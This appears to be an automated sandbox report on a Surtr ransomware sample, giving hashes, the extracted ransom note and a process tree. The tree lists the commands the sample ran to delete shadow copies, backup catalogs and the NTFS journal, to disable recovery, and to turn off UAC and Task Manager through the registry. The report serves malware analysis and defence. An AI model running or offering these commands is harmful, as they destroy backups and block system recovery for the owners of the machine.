Analysis

  • max time kernel
    150s
  • max time network
    143s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    10-11-2022 07:43

General

  • Target

    abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe

  • Size

    1.1MB

  • MD5

    ad539ebdf9e34e02be487134cf9a6713

  • SHA1

    b5af8a12c5a6ed369debaad7eab59e3cb1715e2d

  • SHA256

    abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14

  • SHA512

    386291d7dd9fa62f7514e784a238bd7a5099a0d2edd8af6085c61e3953a6914faf3dc299f07d56bed3b5b337a18c8b636c84f88693d3bc2512f8dfd51e711492

  • SSDEEP

    24576:g3BzKGHF0bxTCFvXwKt/aISpu4Qc6F3v1HT2BzN2tgGS3YzYhoHWxVGI8WIQbQ:KV4xTCwu4Qc6/F87gIwQ

Malware Config

Extracted

Path

C:\ProgramData\Service\SURTR_README.hta

Family

surtr

Ransom Note
SurtrRansomware OOPS ALL YOUR IMPORTANT FILES HAVE BEEN ENCRYPTED AND STOLEN !! Notice : There is only one way to restore your data read the boxes carefully! Attention : Do Not change file names. Do Not try to decrypt using third party softwares , it may cause permanent data loss . your files will be sold on the Dark Web after 15 days. Imagine 1 million hackers have all your information including files, IP, name and number and location and ... Do not pay any money before decrypting the test files. You can use our 50% discount if you pay the fee within first 15 days of encryption . otherwise the price will be doubled. In order to warranty you , our team will decrypt 3 of your desired files for free.but you need to pay the specified price for the rest of the operation . How To Decrypt : Your system is offline . in order to contact us you can email this address [email protected] use this ID (7i3ng65rjpb8y4) for the title of your email . If you weren't able to contact us within 24 hours please email : [email protected] If you didn't get any respond within 48 hours use this link (Not Available Now).send your ID and your cryptor name (SurtrRansomwareUserName) therefore we can create another way to contact you as soon as possible

Signatures

  • Deletes NTFS Change Journal 2 TTPs 1 IoCs

    The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.

  • Detects Surtr Payload 1 IoCs
  • Surtr

    Ransomware family first seen in late 2021.

  • UAC bypass 3 TTPs 1 IoCs
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
  • Deletes backup catalog 3 TTPs 1 IoCs

    Uses wbadmin.exe to inhibit system recovery.

  • Disables Task Manager via registry modification
  • Disables use of System Restore points 1 TTPs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Adds Run key to start application 2 TTPs 8 IoCs
  • Drops desktop.ini file(s) 2 IoCs
  • Enumerates connected drives 3 TTPs 64 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in Program Files directory 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks SCSI registry key(s) 3 TTPs 4 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Interacts with shadow copies 2 TTPs 51 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 11 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
    "C:\Users\Admin\AppData\Local\Temp\abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe"
    1⤵
    • Checks computer location settings
    • Drops desktop.ini file(s)
    • Enumerates connected drives
    • Drops file in Program Files directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of WriteProcessMemory
    PID:2204
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c mkdir C:\ProgramData\Service
      2⤵
        PID:4936
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c @echo off
        2⤵
          PID:4856
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c chcp 437
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:4836
          • C:\Windows\SysWOW64\chcp.com
            chcp 437
            3⤵
              PID:4900
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c mkdir "%TEMP%\Service"
            2⤵
              PID:5068
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet
              2⤵
                PID:1808
                • C:\Windows\system32\vssadmin.exe
                  vssadmin.exe Delete Shadows /all /quiet
                  3⤵
                  • Interacts with shadow copies
                  PID:4348
              • C:\Windows\System32\cmd.exe
                "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB
                2⤵
                  PID:5036
                  • C:\Windows\system32\vssadmin.exe
                    vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB
                    3⤵
                    • Interacts with shadow copies
                    PID:4364
                • C:\Windows\System32\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded
                  2⤵
                  • Suspicious use of WriteProcessMemory
                  PID:2884
                  • C:\Windows\system32\vssadmin.exe
                    vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded
                    3⤵
                    • Interacts with shadow copies
                    PID:2908
                • C:\Windows\System32\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No
                  2⤵
                  • Suspicious use of WriteProcessMemory
                  PID:4500
                  • C:\Windows\system32\bcdedit.exe
                    bcdedit /set {default} recoveryenabled No
                    3⤵
                    • Modifies boot configuration data using bcdedit
                    PID:1764
                • C:\Windows\System32\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=E:\ /on=E:\ /maxsize=401MB
                  2⤵
                  • Suspicious use of WriteProcessMemory
                  PID:2352
                  • C:\Windows\system32\vssadmin.exe
                    vssadmin resize shadowstorage /for=E:\ /on=E:\ /maxsize=401MB
                    3⤵
                    • Enumerates connected drives
                    • Interacts with shadow copies
                    PID:2968
                • C:\Windows\System32\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
                  2⤵
                  • Suspicious use of WriteProcessMemory
                  PID:4740
                  • C:\Windows\system32\bcdedit.exe
                    bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
                    3⤵
                    • Modifies boot configuration data using bcdedit
                    PID:4412
                • C:\Windows\System32\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=E:\ /on=E:\ /maxsize=unbounded
                  2⤵
                    PID:4172
                    • C:\Windows\system32\vssadmin.exe
                      vssadmin resize shadowstorage /for=E:\ /on=E:\ /maxsize=unbounded
                      3⤵
                      • Enumerates connected drives
                      • Interacts with shadow copies
                      PID:1476
                  • C:\Windows\System32\cmd.exe
                    "C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:
                    2⤵
                      PID:4444
                      • C:\Windows\system32\fsutil.exe
                        fsutil.exe usn deletejournal /D C:
                        3⤵
                        • Deletes NTFS Change Journal
                        PID:4044
                    • C:\Windows\System32\cmd.exe
                      "C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet
                      2⤵
                      • Suspicious use of WriteProcessMemory
                      PID:176
                      • C:\Windows\system32\wbadmin.exe
                        wbadmin.exe delete catalog -quiet
                        3⤵
                        • Deletes backup catalog
                        PID:4264
                    • C:\Windows\System32\cmd.exe
                      "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB
                      2⤵
                        PID:788
                        • C:\Windows\system32\vssadmin.exe
                          vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB
                          3⤵
                          • Enumerates connected drives
                          • Interacts with shadow copies
                          PID:4836
                      • C:\Windows\System32\cmd.exe
                        "C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable
                        2⤵
                          PID:3520
                          • C:\Windows\system32\schtasks.exe
                            schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable
                            3⤵
                              PID:5048
                          • C:\Windows\System32\cmd.exe
                            "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
                            2⤵
                              PID:3776
                              • C:\Windows\system32\reg.exe
                                reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
                                3⤵
                                  PID:824
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=G:\ /on=G:\ /maxsize=401MB
                                2⤵
                                  PID:2096
                                  • C:\Windows\system32\vssadmin.exe
                                    vssadmin resize shadowstorage /for=G:\ /on=G:\ /maxsize=401MB
                                    3⤵
                                    • Enumerates connected drives
                                    • Interacts with shadow copies
                                    PID:4120
                                • C:\Windows\System32\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                                  2⤵
                                    PID:604
                                    • C:\Windows\system32\reg.exe
                                      reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                                      3⤵
                                      • UAC bypass
                                      PID:2164
                                  • C:\Windows\System32\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded
                                    2⤵
                                      PID:2136
                                      • C:\Windows\system32\vssadmin.exe
                                        vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded
                                        3⤵
                                        • Enumerates connected drives
                                        • Interacts with shadow copies
                                        PID:4808
                                    • C:\Windows\System32\cmd.exe
                                      "C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
                                      2⤵
                                        PID:864
                                        • C:\Windows\system32\reg.exe
                                          reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
                                          3⤵
                                            PID:2184
                                        • C:\Windows\System32\cmd.exe
                                          "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=G:\ /on=G:\ /maxsize=unbounded
                                          2⤵
                                            PID:4640
                                            • C:\Windows\system32\vssadmin.exe
                                              vssadmin resize shadowstorage /for=G:\ /on=G:\ /maxsize=unbounded
                                              3⤵
                                              • Enumerates connected drives
                                              • Interacts with shadow copies
                                              PID:2216
                                          • C:\Windows\System32\cmd.exe
                                            "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=H:\ /on=H:\ /maxsize=401MB
                                            2⤵
                                              PID:1700
                                              • C:\Windows\system32\vssadmin.exe
                                                vssadmin resize shadowstorage /for=H:\ /on=H:\ /maxsize=401MB
                                                3⤵
                                                • Enumerates connected drives
                                                • Interacts with shadow copies
                                                PID:4164
                                            • C:\Windows\System32\cmd.exe
                                              "C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v StartMenuLogOff /t REG_DWORD /d 1 /f
                                              2⤵
                                                PID:1424
                                                • C:\Windows\system32\reg.exe
                                                  reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v StartMenuLogOff /t REG_DWORD /d 1 /f
                                                  3⤵
                                                    PID:2024
                                                • C:\Windows\System32\cmd.exe
                                                  "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\System /v AllowBlockingAppsAtShutdown /t REG_DWORD /d 1 /f
                                                  2⤵
                                                    PID:1416
                                                    • C:\Windows\system32\reg.exe
                                                      reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\System /v AllowBlockingAppsAtShutdown /t REG_DWORD /d 1 /f
                                                      3⤵
                                                        PID:3492
                                                    • C:\Windows\System32\cmd.exe
                                                      "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=H:\ /on=H:\ /maxsize=unbounded
                                                      2⤵
                                                        PID:3420
                                                        • C:\Windows\system32\vssadmin.exe
                                                          vssadmin resize shadowstorage /for=H:\ /on=H:\ /maxsize=unbounded
                                                          3⤵
                                                          • Enumerates connected drives
                                                          • Interacts with shadow copies
                                                          PID:3408
                                                      • C:\Windows\System32\cmd.exe
                                                        "C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
                                                        2⤵
                                                          PID:4992
                                                          • C:\Windows\system32\reg.exe
                                                            reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
                                                            3⤵
                                                              PID:3296
                                                          • C:\Windows\System32\cmd.exe
                                                            "C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f
                                                            2⤵
                                                              PID:4564
                                                              • C:\Windows\system32\reg.exe
                                                                reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f
                                                                3⤵
                                                                  PID:1108
                                                              • C:\Windows\System32\cmd.exe
                                                                "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=I:\ /on=I:\ /maxsize=unbounded
                                                                2⤵
                                                                  PID:5080
                                                                  • C:\Windows\system32\vssadmin.exe
                                                                    vssadmin resize shadowstorage /for=I:\ /on=I:\ /maxsize=unbounded
                                                                    3⤵
                                                                    • Interacts with shadow copies
                                                                    PID:220
                                                                • C:\Windows\System32\cmd.exe
                                                                  "C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
                                                                  2⤵
                                                                    PID:4860
                                                                    • C:\Windows\system32\reg.exe
                                                                      reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
                                                                      3⤵
                                                                        PID:4912
                                                                    • C:\Windows\System32\cmd.exe
                                                                      "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=I:\ /on=I:\ /maxsize=401MB
                                                                      2⤵
                                                                        PID:3988
                                                                        • C:\Windows\system32\vssadmin.exe
                                                                          vssadmin resize shadowstorage /for=I:\ /on=I:\ /maxsize=401MB
                                                                          3⤵
                                                                          • Enumerates connected drives
                                                                          • Interacts with shadow copies
                                                                          PID:3444
                                                                      • C:\Windows\System32\cmd.exe
                                                                        "C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f
                                                                        2⤵
                                                                          PID:3200
                                                                          • C:\Windows\system32\reg.exe
                                                                            reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f
                                                                            3⤵
                                                                              PID:3564
                                                                          • C:\Windows\System32\cmd.exe
                                                                            "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=J:\ /on=J:\ /maxsize=401MB
                                                                            2⤵
                                                                              PID:3748
                                                                              • C:\Windows\system32\vssadmin.exe
                                                                                vssadmin resize shadowstorage /for=J:\ /on=J:\ /maxsize=401MB
                                                                                3⤵
                                                                                • Enumerates connected drives
                                                                                • Interacts with shadow copies
                                                                                PID:4672
                                                                            • C:\Windows\System32\cmd.exe
                                                                              "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=K:\ /on=K:\ /maxsize=401MB
                                                                              2⤵
                                                                                PID:3616
                                                                                • C:\Windows\system32\vssadmin.exe
                                                                                  vssadmin resize shadowstorage /for=K:\ /on=K:\ /maxsize=401MB
                                                                                  3⤵
                                                                                  • Enumerates connected drives
                                                                                  • Interacts with shadow copies
                                                                                  PID:5976
                                                                              • C:\Windows\System32\cmd.exe
                                                                                "C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d 1 /f
                                                                                2⤵
                                                                                  PID:3552
                                                                                  • C:\Windows\system32\reg.exe
                                                                                    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d 1 /f
                                                                                    3⤵
                                                                                      PID:5892
                                                                                  • C:\Windows\System32\cmd.exe
                                                                                    "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=J:\ /on=J:\ /maxsize=unbounded
                                                                                    2⤵
                                                                                      PID:4868
                                                                                      • C:\Windows\system32\vssadmin.exe
                                                                                        vssadmin resize shadowstorage /for=J:\ /on=J:\ /maxsize=unbounded
                                                                                        3⤵
                                                                                        • Enumerates connected drives
                                                                                        • Interacts with shadow copies
                                                                                        PID:5764
                                                                                    • C:\Windows\System32\cmd.exe
                                                                                      "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=K:\ /on=K:\ /maxsize=unbounded
                                                                                      2⤵
                                                                                        PID:4744
                                                                                        • C:\Windows\system32\vssadmin.exe
                                                                                          vssadmin resize shadowstorage /for=K:\ /on=K:\ /maxsize=unbounded
                                                                                          3⤵
                                                                                          • Enumerates connected drives
                                                                                          • Interacts with shadow copies
                                                                                          PID:4856
                                                                                      • C:\Windows\System32\cmd.exe
                                                                                        "C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v StartMenuLogOff /t REG_DWORD /d 1 /f
                                                                                        2⤵
                                                                                          PID:4932
                                                                                          • C:\Windows\system32\reg.exe
                                                                                            reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v StartMenuLogOff /t REG_DWORD /d 1 /f
                                                                                            3⤵
                                                                                              PID:5964
                                                                                          • C:\Windows\System32\cmd.exe
                                                                                            "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f
                                                                                            2⤵
                                                                                              PID:4756
                                                                                              • C:\Windows\system32\reg.exe
                                                                                                reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f
                                                                                                3⤵
                                                                                                  PID:6200
                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=M:\ /on=M:\ /maxsize=401MB
                                                                                                2⤵
                                                                                                  PID:2712
                                                                                                  • C:\Windows\system32\vssadmin.exe
                                                                                                    vssadmin resize shadowstorage /for=M:\ /on=M:\ /maxsize=401MB
                                                                                                    3⤵
                                                                                                    • Interacts with shadow copies
                                                                                                    PID:6300
                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f
                                                                                                  2⤵
                                                                                                    PID:1220
                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                      reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f
                                                                                                      3⤵
                                                                                                        PID:6536
                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                      "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f
                                                                                                      2⤵
                                                                                                        PID:4480
                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                          reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f
                                                                                                          3⤵
                                                                                                            PID:6836
                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                          "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=O:\ /on=O:\ /maxsize=401MB
                                                                                                          2⤵
                                                                                                            PID:3000
                                                                                                            • C:\Windows\system32\vssadmin.exe
                                                                                                              vssadmin resize shadowstorage /for=O:\ /on=O:\ /maxsize=401MB
                                                                                                              3⤵
                                                                                                              • Enumerates connected drives
                                                                                                              • Interacts with shadow copies
                                                                                                              PID:6828
                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                            "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f
                                                                                                            2⤵
                                                                                                              PID:3676
                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f
                                                                                                                3⤵
                                                                                                                  PID:6708
                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f
                                                                                                                2⤵
                                                                                                                  PID:5236
                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f
                                                                                                                    3⤵
                                                                                                                      PID:4092
                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                    "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=O:\ /on=O:\ /maxsize=unbounded
                                                                                                                    2⤵
                                                                                                                      PID:5220
                                                                                                                      • C:\Windows\system32\vssadmin.exe
                                                                                                                        vssadmin resize shadowstorage /for=O:\ /on=O:\ /maxsize=unbounded
                                                                                                                        3⤵
                                                                                                                        • Interacts with shadow copies
                                                                                                                        PID:6960
                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                      "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=P:\ /on=P:\ /maxsize=401MB
                                                                                                                      2⤵
                                                                                                                        PID:5292
                                                                                                                        • C:\Windows\system32\vssadmin.exe
                                                                                                                          vssadmin resize shadowstorage /for=P:\ /on=P:\ /maxsize=401MB
                                                                                                                          3⤵
                                                                                                                          • Enumerates connected drives
                                                                                                                          • Interacts with shadow copies
                                                                                                                          PID:7104
                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                        "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f
                                                                                                                        2⤵
                                                                                                                          PID:4644
                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                            reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f
                                                                                                                            3⤵
                                                                                                                              PID:6700
                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                            "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=N:\ /on=N:\ /maxsize=unbounded
                                                                                                                            2⤵
                                                                                                                              PID:2344
                                                                                                                              • C:\Windows\system32\vssadmin.exe
                                                                                                                                vssadmin resize shadowstorage /for=N:\ /on=N:\ /maxsize=unbounded
                                                                                                                                3⤵
                                                                                                                                • Interacts with shadow copies
                                                                                                                                PID:6692
                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                              "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=N:\ /on=N:\ /maxsize=401MB
                                                                                                                              2⤵
                                                                                                                                PID:5048
                                                                                                                                • C:\Windows\system32\vssadmin.exe
                                                                                                                                  vssadmin resize shadowstorage /for=N:\ /on=N:\ /maxsize=401MB
                                                                                                                                  3⤵
                                                                                                                                  • Enumerates connected drives
                                                                                                                                  • Interacts with shadow copies
                                                                                                                                  PID:6040
                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=M:\ /on=M:\ /maxsize=unbounded
                                                                                                                                2⤵
                                                                                                                                  PID:532
                                                                                                                                  • C:\Windows\system32\vssadmin.exe
                                                                                                                                    vssadmin resize shadowstorage /for=M:\ /on=M:\ /maxsize=unbounded
                                                                                                                                    3⤵
                                                                                                                                    • Enumerates connected drives
                                                                                                                                    • Interacts with shadow copies
                                                                                                                                    PID:6292
                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=L:\ /on=L:\ /maxsize=unbounded
                                                                                                                                  2⤵
                                                                                                                                    PID:4080
                                                                                                                                    • C:\Windows\system32\vssadmin.exe
                                                                                                                                      vssadmin resize shadowstorage /for=L:\ /on=L:\ /maxsize=unbounded
                                                                                                                                      3⤵
                                                                                                                                      • Enumerates connected drives
                                                                                                                                      • Interacts with shadow copies
                                                                                                                                      PID:6260
                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                    "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f
                                                                                                                                    2⤵
                                                                                                                                      PID:1592
                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                        reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f
                                                                                                                                        3⤵
                                                                                                                                          PID:6308
                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                        "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=L:\ /on=L:\ /maxsize=401MB
                                                                                                                                        2⤵
                                                                                                                                          PID:3244
                                                                                                                                          • C:\Windows\system32\vssadmin.exe
                                                                                                                                            vssadmin resize shadowstorage /for=L:\ /on=L:\ /maxsize=401MB
                                                                                                                                            3⤵
                                                                                                                                            • Interacts with shadow copies
                                                                                                                                            PID:6192
                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                          "C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f
                                                                                                                                          2⤵
                                                                                                                                            PID:2620
                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                              reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f
                                                                                                                                              3⤵
                                                                                                                                                PID:2764
                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                              "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupUI /t REG_DWORD /d 1 /f
                                                                                                                                              2⤵
                                                                                                                                                PID:5428
                                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                                  reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupUI /t REG_DWORD /d 1 /f
                                                                                                                                                  3⤵
                                                                                                                                                    PID:6716
                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                  "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableSystemBackupUI /t REG_DWORD /d 1 /f
                                                                                                                                                  2⤵
                                                                                                                                                    PID:5484
                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                      reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableSystemBackupUI /t REG_DWORD /d 1 /f
                                                                                                                                                      3⤵
                                                                                                                                                        PID:7008
                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                      "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=Q:\ /on=Q:\ /maxsize=401MB
                                                                                                                                                      2⤵
                                                                                                                                                        PID:5416
                                                                                                                                                        • C:\Windows\system32\vssadmin.exe
